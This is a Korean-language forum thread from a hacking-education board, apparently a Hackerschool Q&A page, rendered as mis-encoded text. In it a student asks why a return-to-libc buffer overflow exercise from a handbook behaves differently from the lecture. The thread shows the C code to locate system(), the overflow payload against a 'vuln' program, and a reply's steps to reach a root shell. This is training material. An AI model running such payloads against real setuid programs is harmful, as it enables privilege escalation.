½Ã½ºÅÛ ÇØÅ·

 1574, 1/79 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   ygw0225
   BOFÇÚµåºÏ ¸¶Áö¸·½Ç½À¹®Á¦ Áú¹®..

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1725 [º¹»ç]


»ç½Ç Àú¿Í°°ÀÌ Áú¹®ÇÑ ±ÛÀÌ Àֱ淡ºÃ´Âµ¥ ´äº¯ÀÌ ¹«½¼¸»ÀÎÁö ¸ô¶ó¼­
°°Àº Áú¹®µå¸³´Ï´Ù.

ÇÚµåºÏÀÇ °­Á°úÁ¤°ú ´Ù¸£°Ô ³ª¿Í ÇöÀç ¸·Èù»óÅÂÀÔ´Ï´Ù ¤Ð¤Ð
--------------------------------------------------

[student@localhost chapter_21]$ /bin/bash2

--------------------------------------------------

--------------------------------------------------

[student@localhost chapter_21]$ export PATH=$PATH:.

--------------------------------------------------

-------------------------------------------------------------

[student@localhost chapter_21]$ cat > addr_of_system.c
#include <dlfcn.h>

int main()
{
   long addr;
   void *handle;

   handle = dlopen("/lib/libc.so.6", RTLD_LAZY);
   addr = (long)dlsym(handle, "system");
   printf("system() is at 0x%x\n", addr);

}
(ÄÁÆ®·²+D ÀÔ·Â)
[student@localhost chapter_21]$
[student@localhost chapter_21]$ gcc -o ./addr_of_system addr_of_system.c -lc -ldl
[student@localhost chapter_21]$ ./addr_of_system
system() is at 0x40058ae0
[student@localhost chapter_21]$

--------------------------------------------------------------

-> systemÀÇ ÁÖ¼Ò¸¦ ¾Ë¾Æ³½ µÚ
----------------------------------------------------------------------------------------------------------

[student@localhost chapter_21]$ ./vuln `perl -e 'printf "A"x84 . "\xe0\x8a\x05\x40"'`
your input is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?@
sh: ?¿C?? command not found
Segmentation fault
[student@localhost chapter_21]$

----------------------------------------------------------------------------------------------------------

À§¿¡ ¸í·ÉÀ» ÃÆÀ»¶§ °­Á¿¡¼­´Â À§ ó·³ ¶ß´Âµ¥ ¹ÝÇØ Àú´Â ¾Æ·¡¿Í°°Àº ¹®±¸°¡ ¶å´Ï´Ù.

your input is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(ÀÌ»óÇÑ ¹®ÀÚ)
sh: syntax error near unexpercted token '(ÀÌ»óÇѹ®ÀÚ)'
sh: -c: line 1: '(ÀÌ»óÇѹ®ÀÚ)'
Segmentation fault

¾î¶»°Ô ÇØ¾ß °­ÁÂó·³ µÉ ±î¿ä?
  Hit : 3417     Date : 2014/01/08 01:34


    
cd80 ./vuln `perl -e 'printf "A"x84 . "\xe0\x8a\x05\x40"'` > ./asdfasdf ÇϽŴÙÀ½¿¡
xxd ./asdfasdf ¿¡¼­ ¸»¾¸ÇϽŠÀÌ»óÇѹ®ÀÚÀÇ Çí½º¿­À» ãÀ¸½Å´ÙÀ½¿¡
cp /bin/sh $(perl -e 'print "\x~~\x~~\x~~"') ÀÌ·±½ÄÀ¸·Î /bin/sh¸¦ ±× ÀÌ»óÇѹ®ÀÚ·Î º¹»çÇϽŴÙÀ½¿¡
export .:$PATH ÇÏ½Ã°í ´Ù½Ã
./vuln `perl -e 'printf "A"x84 . "\xe0\x8a\x05\x40"'`
Çغ¸¼¼¿ä		 2014/01/08  
ygw0225 ¿Í¿ì °¨»çÇÕ´Ï´Ù! ¸»¾¸ÇϽŴë·Î ÇÏ°í³ª¼­ root½©À» ȹµæÇÏ°Ô µÇ¾ú½À´Ï´Ù.
±×·±µ¥ Á¦°¡ ¿Ïº®ÇÏ°Ô ÀÌÇظ¦ ÇÏÁö¸øÇÏ¿´½À´Ï´Ù; Áú¹® ¸î°¡Áöµå¸®°Ú½À´Ï´Ù.

1. À§´ñ±Û·Î ¸»¾¸ÇØÁֽŠÇØ°áÃ¥À» ¶È°°ÀÌ ÇÏ¿´´Âµ¥¿ä ¸»¾¸ÇϽŴë·Î ÇÏ°í³ª¼­ ´Ù¼¸¹ø°ÁÙ(À§´ñ±Û¿¡¼­)
./vuln `perl -e 'printf "A"x84 . "\xe0\x8a\x05\x40"'` ÀÔ·ÂÇÏ¸é ¹Ù·Î root½©À» ȹµæÇÏ°Ô µÇ´Â°Ç°¡¿ä
¾Æ´Ï¸é syntax error ¸¦ sh: ?¿C?? command not found ·Î °­Á¿¡¼­Ã³·³ ³ª¿À°Ô ÇϱâÀ§ÇÑ °úÁ¤Àΰ¡¿ä?
¸»¾¸ÇϽŴë·Î µû¶óÇÏ°í³ª´Ï sh: ?¿C?? command not found ·Î ³ª¿Í¼­ system()»çÀÌ¿¡ Çí½º¿­À» È®ÀÎÇؼ­
¸µÅ©ÆÄÀÏÀ» ¸¸µé¾î ¿¬°á½ÃÄÑ È®ÀÎÀ»Çß½À´Ï´Ù...°á±¹ °°Àº°ÍÀ» ¹Ýº¹ÇØ¾ß Çϴ°ǰ¡¿ä?

2. ./vuln `perl -e 'printf "A"x84 . "\xe0\x8a\x05\x40"'` > ./asdfasdf ÀÌ·¸°Ô ÇÒ°æ¿ì ÆÄÀÏÀº ¸¸µé¾îÁö´Âµ¥
xxd asdfasdf ÇÏ¸é ¾Æ¹«°Íµµ ¾È¶å´Ï´Ù 2>asdfasdf .. ±×·¯´Ï±î 2¸¦ ¾Õ¿¡ ºÙ¿©¾ß xxd·Î ÇÒ¶§ Á¦´ë·Î º¸ÀÌ´õ±º¿ä ¹«½¼Â÷ÀÌ°¡Àִ°ÅÁÒ?

3. ./vuln `perl -e 'printf "A"x84 . "\xe0\x8a\x05\x40"'` ¿¡¼­ x84¿Í "\xe...»çÀÌ¿¡ÀÖ´Â . (Á¡) ÀÌ°Ô ¹«½¼ÀǹÌÀÌÁÒ?
 2014/01/08  
cd80 1.
ù¹ø° ./vuln ~~~~ Àº sh: ?¿C?? command not found°¡ Æ÷ÇÔµÈ ¿¡·¯¸Þ¼¼Áö¸¦ asdfasdf¿¡ ³Ö´Â ¸í·ÉÀÌ°í
ÀÌ sh: ¿Í command »çÀÌ¿¡ ÀÖ´Â ±úÁø ¹®ÀÚ°¡ ½ÇÁ¦·Î system()ÇÔ¼öÀÇ ÀÎÀÚ·Î µé¾î°¡ ÇÁ·Î±×·¥¸íÀ¸·Î ½ÇÇàÇÏ·Á´Ù ½ÇÆÐÇÑ ¹®ÀÚ¿­ÀÔ´Ï´Ù
µû¶ó¼­ ½ÇÁ¦·Î ÀÌ ¹®ÀÚ¿­·Î ÇÁ·Î±×·¥À» ¸¸µé¾î ½ÇÇàÇÒ¼ö ÀÖµµ·Ï ÇÕ´Ï´Ù

»ç¿ëÇÏ°í °è½Å ¹æ¹ýÀ¸·Î °ø°ÝÇÒ¶© °°Àº °úÁ¤À» ¹Ýº¹ÇØ¾ß ÇÕ´Ï´Ù
Áö±Ý »ç¿ëÇÏ°í °è½Å ±â¹ýÀ» RTLÀ̶ó°í Çϴµ¥
https://research.hackerschool.org:8080/Datas/Research_Lecture/[6%C2%F7]_Return_to_Lib_%B1%E2%B9%FD_%C0%CC%C7%D8%C7%CF%B1%E2.txt
À̹®¼­³ª ±¸±Û¿¡ "rtl °ø°Ý" À̶ó°í °Ë»öÇÏ½Ã¸é ³ª¿À´Â ¹®¼­³ª ±ÛµéÀ» º¸½Ã¸é¼­ °øºÎÇϽøé ÁÁ½À´Ï´Ù
https://research.hackerschool.org:8080/Html/WG_Documents.html
¿©±â¿¡ ½Ã½ºÅÛÇØÅ· °ü·Ã¹®¼­°¡ ¸¹À¸´Ï Âü°íÇϼ¼¿ä~

2.
¾Æ 2>¸¦ ÇÑ°Ç stderr¸¦ ¸®´ÙÀÌ·º¼ÇÇϱâ À§Çؼ­ ¿´½À´Ï´Ù
¸®´ª½º¿¡¼­ fd ¼¼°³°¡ Á¤ÇØÁø¿ëµµ·Î ¾²À̴µ¥
0Àº stdin, 1Àº stdout, 2´Â stderrÀÔ´Ï´Ù
¿¡·¯¸Þ¼¼Áö¿¡ ÇÁ·Î±×·¥¸íÀÌ ÀÖÀ¸´Ï stderr¸¦ ¸®´ÙÀÌ·º¼Ç ÇؾßÇÕ¤¤µð¤¿

3. Á¡Àº À߸ø½è³×¿ä ¤»¤» Á¡À¸·Îµµ µÇ±ä Çϴµ¥
¹®ÀÚ¿­ µÎ°³¸¦ À̾îÁÖ´Â ¹®¹ýÀÔ´Ï´Ù
½°Ç¥·Îµµ µÇ°í Á¡À¸·Îµµ µË´Ï´Ù		 2014/01/11  
ygw0225 cd80´Ô!//Á¤¸»°¨»çÇÕ´Ï´Ù...Â÷±ÙÂ÷±Ù Çϳª¾¿ ¹è¿ì·Á°íÇϴµ¥, ¿ª½Ã ½±Áø¾Ê³×¿ä^^; 2014/01/11  
1574   pwnable.kr echo1 Áú¹®2 (½ºÆ÷ ÁÖÀÇ)[2]     turttle2s
 10/05 1313
1573   LOB GATE¹®Á¦ Ç®¸é¼­ ±Ã±ÝÇÑÁ¡[3]     hackxx123
 08/24 1041
1572   libc°ü·Ã - 2[5]     lMaxl04
 08/24 941
1571   ASLRÀÌ °É·ÁÀÖÀ»¶§ ret¿¡ ROPÀ¸·Î jmp %espÀ» »ç¿ëÇÑ °æ¿ì.[3]     lMaxl04
 06/29 1212
1570   ¸®¸ðÆ® ȯ°æ¿¡¼­ÀÇ ½ºÅà ÁÖ¼Ò È®ÀÎ ¹æ¹ýÀÌ ±Ã±ÝÇÕ´Ï´Ù.[2]     lMaxl04
 06/16 988
1569   ÇØÅ· ÇÁ¸®¼­¹ö ¾ø¾îÁ³³ª¿ä?[1]     terfkim
 04/15 1780
1568   ½ºÅÿ¡ µ¥ÀÌÅÍ ³ÖÀ» ¶§ SIGSEGV[4]     turttle2s
 02/04 1507
1567   pwnable.kr echo1 Áú¹®[2]     turttle2s
 06/17 1777
1566   ROP strcpy °ü·Ã Áú¹®ÀÔ´Ï´Ù.[3]     heeyoung0511
 06/16 1616
1565   Level2 -> Level3 ¿¡¼­ vi¿Í /usr/bin/EditorÀÇ Â÷ÀÌ[2]     hyemin1826
 07/18 1934
1564   Trainer3 ftz.hackerschool.org È£½ºÆ® Á¢¼Ó ºÒ°¡[1]     hyemin1826
 07/18 3267
1563   dllÀÎÁ§¼Ç ½ÇÇèÁß Áú¹® µå¸³´Ï´Ù.[1]     kkk477
 05/31 1896
1562   ÆÐŶ º¹È£È­¸¦ ¸¶½ºÅÍ ÇÏ·Á¸é ¾î¶² °úÁ¤ÀÌ ÀÖ¾î¾ßÇϳª¿ä?     sa0814
 04/01 1733
1561   »ç±â[2]     jas08
 03/31 2035
1560   ½Ã½ºÅÛ ÄÝÀÌ °¡´ÉÇÑ ¸Þ¸ð¸® ¿µ¿ª°ú ºÒ°¡´ÉÇÑ ¸Þ¸ð¸® ¿µ¿ªÀÌ Á¸ÀçÇϳª¿ä?     ocal
 03/30 1773
1559   pwntools »ç¿ë½Ã¿Í ±âº» socket ¸ðµâ ÀÌ¿ë½Ã Â÷ÀÌ?[4]     ocal
 01/09 2336
1558   lob level19(nightmare) °ü·ÃÁú¹®[1]     dnjsdnwja
 12/18 1794
1557   ftz level2 Áú¹®ÀÖ½À´Ï´Ù[1]     kihyun1998
 12/13 1881
1556   ftz level2¹ø Ǫ´Âµ¥¿ä ±ÇÇÑÀÌ...     kihyun1998
 12/06 1741
1555   ½Ã½ºÅÛÇØÅ·ÇÒ¶§ [3]     thsrhkdwns
 12/05 2238
1 [2][3][4][5][6][7][8][9][10]..[79]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org